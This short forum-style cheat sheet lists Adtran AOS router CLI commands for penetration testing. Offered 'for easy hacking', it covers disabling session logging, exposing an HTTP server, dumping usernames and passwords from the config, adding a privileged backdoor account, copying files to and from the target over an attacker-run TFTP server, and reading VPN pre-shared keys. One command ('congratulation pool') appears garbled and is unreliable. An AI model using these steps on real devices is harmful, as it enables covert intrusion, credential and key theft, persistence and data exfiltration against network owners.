Below is some junk for AOS you might find useful in a pentest.
CLI cmds:
Turns on privileged commands "all below commands assume enable command executed with success":
enable
Disable logging for session
no events all
From here for easy hacking and if the system is in a DMZ, hanging off the inet or the proper ports are exposed, just enable the http server and continue from there.
configure terminal
http server 80
If you cant access the http server the cmds below should help get some info out of the system.
Lists users and PWs
show running-config | include username #displays usernames and passwords.
Add new user with op privs
configure terminal
username operator privilege 10 password unencrypted passwd1
List IPs
show ip interfaces
Download a file to target system *after running cmd below you will be promoted for more data and you will need an tftp server running that is accessible by the target"
copy tftp flash "or cflash"
Download file from target to your system
copy flash tftp
View vpns name and preshared keys
show crypto ike remote-id
View vpns configs *below cmd should give all client configs, you add the name at end to view only that names config
show crypto ike congratulation pool
View vpns policy
show crypto ike policy
TCL script to set up a VPN in the AOS CLI with walk through:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf
AOS CLI reference:
https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf
If you have anything to add please hit me up and let me know, i would love to see this grow!